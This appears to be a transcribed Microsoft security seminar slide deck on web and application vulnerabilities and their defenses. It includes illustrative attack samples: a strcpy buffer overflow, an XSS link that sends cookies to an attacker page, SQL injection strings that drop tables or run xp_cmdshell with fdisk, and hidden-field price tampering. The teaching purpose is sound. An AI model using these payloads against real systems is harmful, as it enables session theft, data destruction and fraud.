Managing Risk: Application Development Principles and Best Practices

Managing Risk: Application Development Principles and Best Practices Dave Glover Microsoft Pty Ltd http://blogs.msdn.com/dglover

The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer' not the Network or System layer."

Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

Buffer Overruns • Occurs when data exceeds the expected size and overwrites other values • Exists primarily in unmanaged C/C++ code • Includes four types: • Stack-based • Heap overruns • V-table and function pointer overwrites • Exception handler overwrites • Can be exploited by worms and can result in: • Access Violation (Denial of Service) • Instability • Code Injection

How Stack-Based Buffer Overruns Work #include <string.h> void flawed(char * str) { char buffer[10]; strcpy(buffer, str); } void main() { flawed("This string is too long"); }

Defending Against Buffer Overruns • Deprecated and should be avoided… • Strcpy, strncpy, CopyMemory MultiByteToWideChar,… • Use strsafe.h for safer buffer handling • Use the /GS compile option in Visual C++ .NET • Check all array indexes • Use recognized file-path processing methods, such as splitpath (C runtime) • Use managed code • But pay attention to PInvoke and COM Interop

Arithmetic Errors • Occur when the limitations of a variable are exceeded • Lead to serious runtime issues • Are often overlooked and underestimated • Include: • Overflow – value too large for data type • Underflow – value too small for data type

Arithmetic Overflow- CalEngine- Purchase.aspx- GoodPurchase.aspx

Defending Against Arithmetic Errors • Understand the Limitations • Unit Test Boundary Conditions • Consider limitations of data types • Consider writing safe, reusable functions • Consider using a safe template class (if coding in C++) • Use Languages that support overflow checking – VB.NET and C# !!

Cross-Site Scripting • Malicious script is sent to a Web application as input. • Echoed back to a user’s browser, where it is executed • Targets your users, your application is the vehicle • Attacks are via carefully crafted hyperlinks • Allows hackers to: • Execute malicious script in a client’s Web browser • Insert <script>, <object>, <applet>, <form>, and <embed> tags • Steal Web session information and cookies (inc Authentication) • Access the client computer resources

How Cross-Site Scripting Works URL points to the site that the hacker wants to attack <a href="http://…/Search.aspx? Search=<script language='javascript'> document.location.replace ('http://localhost/EvilPage.aspx? Cookie=‘ + document.cookie); </script>">…</a> Query string contains embedded JavaScript that redirects to the hacker’s page and transmits any cookies issued by Search.aspx in a query string

What Is One-Click Attack • Site offers persistent sign-in option (cookies) • Victim user navigates to (or opens) an HTML page – perhaps a “once in a lifetime offer” • One or more actions are carried out using the trustof the victim user which is completely unsuspectingto that user

Cross Site Script Attacks- Search.aspx- Review.aspx- AntiXSS Library- Secure Controls- GoodSearch.aspx- Validation Controls- Secure Frames- One Click Attack

Defending Against Cross-Site Scripting Attacks • Do not • Trust user input • Echo client-supplied data without encoding • Store secret information in cookies • Do • Take advantage of ASP.NET’s validateRequest • Take advantage of ASP.NET’s ViewStateUserKey • Consider AntiXSS for data encoding • Use the HttpOnly cookie option • Use the <frame> security attribute • Implement Secure Custom Controls

Defending Against XSS • Input validation – First line of defense • Output encoding • Platform features • Server.HtmlEncode() • Ok: principle of exclusions or black-listing • Use Anti-XSS • Better: principle of inclusions or white-listing Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding: Bad code: someLabel.Text = "Results for " + searchstring + ":"; Mitigation using Anti-XSS: someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";

Defending Against One-Click Attack • Browser’s cross-frame security limits this to a “write-only” attack • Concept for defense: Require a data element in the request which the attacker can’t supply • Check Referrer field • In .Net 1.1 use ViewStateUserKey override protected void OnInit(EventArgs e) { // ... ViewStateUserKey=User.Identity.Name; // ... }

SQL Injection • Adds SQL statements to user input to: • Probe databases, execute multiple SQL statements • Bypass authorization • Call built-in stored procedures • Exploits applications that don’t validate input • Input from <form> fields, query strings, cookies

How SQL Injection Works Model Query SELECT COUNT (*) FROM Users WHERE UserName=‘Jeff’ AND Password=‘imbatman’ Malicious Query SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ "or 1=1" matches every record in the table "--" comments out the remainder of the query

Examples Of SQL Injection • If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following • ALFKI1001 • ALFKI1001' or 1=1 -- • ALFKI1001'; DROP TABLE OrderDetail -- • ALFKI1001'; exec xp_cmdshell('fdisk.exe') -- sqlString = Format.String( select count (*) from customers where username='{0}' and password='{1}‘, userName, password));

SQL Injection Attack- Login Attack- Search Page Attack- SQL Cmd Shell Attack

Defending Against SQL Injection • Code against SQL Injection Attacks • Sanitize all input • Don’t use Dynamic SQL commands • Use Secured Stored Procedures or Parameterized Commands • Run with least privilege • Never execute as “sa” • Restrict access to built-in stored procedures • Store connection strings securely • Integrated Security Better • Encrypt Web.Config Connections Section • DPAPI or Configuration Application Block • Do not echo database errors (fail intelligently) • Apply administrative protections to SQL Server http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp

Key Plaintext Ciphertext Algorithm Cryptography Weaknesses • Inappropriate use of algorithms • Creating your own • Using weak ones • Incorrect application • Failure to keep keys secure • Insecure storage • Extensive duration of use • The human factor • Accidental release of private keys I need three of the above to decrypt your data!

Defending Against Cryptography Weaknesses • Recycle keys periodically • Use ACLs to restrict access to keys • Store keys on an external device • Use larger keys to provide increased security • Use DPAPI to simplify key management, if possible • Do not implement your own cryptographic routines

Hidden-Field Tampering • Exploits applications that persist data between requests by round-tripping it in hidden <input> fields • The technique • Look for <input type="hidden" … > tags • Submit bogus requests with modified value attributes to spoof a Web server

How Hidden-Field Tampering Works Page contains this… <input type="hidden" id="price" value="10000.00"> Postback data should contain this… price="10000.00" Instead it contains this… price="1.00"

Canonicalization Issues • There is usually more than one way to name something • Alternate representations exist for: • File names • URLs • Devices (such as printers) • Hackers may exploit code that makes decisions based on file names or URLs

Canonicalization IssuesExample 1: File Names

Defending Against Canonicalization Issues • Use file-system security to restrict access to private data • Never make a decision based on a name • Disable the IIS Parent Paths setting • Encrypt Web.Config Sections

Encrypting Web.config sections • aspnet_regiis -pc "SampleKeys" -exp • aspnet_regiis -pa "SampleKeys" “domain\acct” • aspnet_regiis -pef connectionStrings . • aspnet_regiis -pdf connectionStrings . • Web.config <configProtectedData defaultProvider="SampleProvider"> <providers> <add name="SampleProvider" type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL“ keyContainerName="SampleKeys" useMachineContainer="true" /> </providers> </configProtectedData>

Traversal Attacks- PathTraversal.htm- ViewImage.aspx- GoodProducts.aspx- Web.Config Encryption

Next Steps • Stay informed about security • Microsoft Developers Network Security Center • http://msdn.microsoft.com/security/ • Microsoft Security Guidance • http://www.microsoft.com/security/guidance/ • Get additional security training • Find online and in-person training seminars: • http://www.microsoft.com/seminar/events/security/ • Read the book: Writing Secure Code • Michael Howard and David LeBlanc • ISBN: 0-7356-1722-8

Defending Against the Others • Improving Web Application Security • Threats and Countermeasures • http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp

Security seminar follow up… • Security e-forum sitewww.microsoft.com.au/eforum • View On demand web casts of all presentations from this event (tell your work colleagues!) • Online Live chats • Have a live chat with the Microsoft security experts you’ll see today. Check the e-forum site for the Live Chat schedule. • Plus lots more… • Evaluation forms - we value your feedback! • Need help with your business’ security? • Q7 - register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your Security challenges • Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360

Managing Risk: Application Development Principles and Best Practices